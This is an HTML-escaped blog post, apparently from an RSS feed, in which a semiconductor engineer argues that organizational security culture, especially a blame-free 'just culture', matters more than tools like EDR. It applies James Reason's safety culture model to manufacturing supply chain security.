&lt;p&gt;The old mindset was simple: &lt;em&gt;buy the right tool, stay protected.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;But today's attacks exploit legitimate entry points — VPN vulnerabilities,&lt;br&gt;
vendor accounts, insider access — and weaponize the &lt;strong&gt;organizational&lt;br&gt;
pressure to prioritize efficiency over security&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Patch the technical holes all you want.&lt;br&gt;
&lt;strong&gt;If there's a human gap, attackers will find it.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Four Components of Safety Culture (James Reason's Model)
&lt;/h2&gt;

&lt;p&gt;British psychologist James Reason's &lt;strong&gt;Safety Culture Model&lt;/strong&gt; — originally&lt;br&gt;
developed for high-risk industries like aviation and nuclear power — is&lt;br&gt;
now making waves in cybersecurity.&lt;/p&gt;

&lt;p&gt;It breaks down into four elements:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Element&lt;/th&gt;
&lt;th&gt;What It Means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Reporting Culture&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;People feel safe reporting mistakes and anomalies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Just Culture&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Evaluation focuses on learning, not blame&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Flexible Culture&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Org structure allows context-based decision-making&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Learning Culture&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Failures are systematically turned into improvements&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most critical — and most overlooked — is &lt;strong&gt;Just Culture&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;According to KnowBe4 Japan's research, &lt;strong&gt;nearly 49% of Japanese companies&lt;br&gt;
subject employees to disciplinary action even for unintentional mistakes.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The result? People hide errors. Risk goes underground. Resilience drops.&lt;/p&gt;

&lt;p&gt;Unlike a factory accident, a cyber incident's root cause often lies in&lt;br&gt;
organizational decision-making — not individual negligence. Asking&lt;br&gt;
&lt;strong&gt;"what structure caused this failure?"&lt;/strong&gt; instead of&lt;br&gt;
&lt;strong&gt;"who made the mistake?"&lt;/strong&gt; is what builds real organizational strength.&lt;/p&gt;




&lt;h2&gt;
  
  
  A Hardware Engineer's Perspective
&lt;/h2&gt;

&lt;p&gt;As a semiconductor engineer, I can tell you this supply chain security&lt;br&gt;
discussion is anything but abstract to me.&lt;/p&gt;

&lt;p&gt;Manufacturing control systems are now cloud-connected. Factory equipment&lt;br&gt;
is tied to external vendor accounts. VPN-based remote work has become&lt;br&gt;
the norm for production efficiency. And the more people involved, the&lt;br&gt;
higher the chance that &lt;strong&gt;someone will prioritize convenience over security.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Three things I find particularly concerning on the ground:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lifecycle vs. patch cycle mismatch&lt;/strong&gt; — Factory equipment runs for
5–10 years, but software vulnerabilities appear every month&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OT/IT boundary collapse&lt;/strong&gt; — Manufacturing networks that used to be
air-gapped are now connected to IT systems, multiplying attack surfaces&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lack of incident reporting culture&lt;/strong&gt; — In manufacturing, there's a
deep-rooted belief that "problems shouldn't happen," making it hard
for small anomalies to get reported&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And as AI automation expands, one thing remains constant:&lt;br&gt;
&lt;strong&gt;humans decide what to delegate to AI.&lt;/strong&gt;&lt;br&gt;
Ethical judgment and critical decision-making will always stay with us.&lt;/p&gt;




&lt;h2&gt;
  
  
  Takeaways &amp;amp; Next Actions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Bottom line: EDR alone isn't enough.&lt;br&gt;
After 2026, organizational culture IS your competitive advantage in security.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's what I'd recommend acting on now:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Build a blame-free incident reporting culture&lt;/strong&gt; (Just Culture first)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit your entire supply chain&lt;/strong&gt; against the new evaluation standard
(October 2026 deadline)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Replace passive e-learning with simulation-based training&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Create psychological safety&lt;/strong&gt; so small concerns get raised early&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;It's time to stop treating security as a cost center and start treating&lt;br&gt;
it as &lt;strong&gt;a demonstration of organizational capability.&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources:&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;ITmedia Enterprise — "The Human Vulnerability: 4 Overlooked Security
Blind Spots" (March 18, 2026)&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;KnowBe4 Japan Seminar Materials&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;NIST Cybersecurity Framework 2.0&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
  </channel>
</rss>
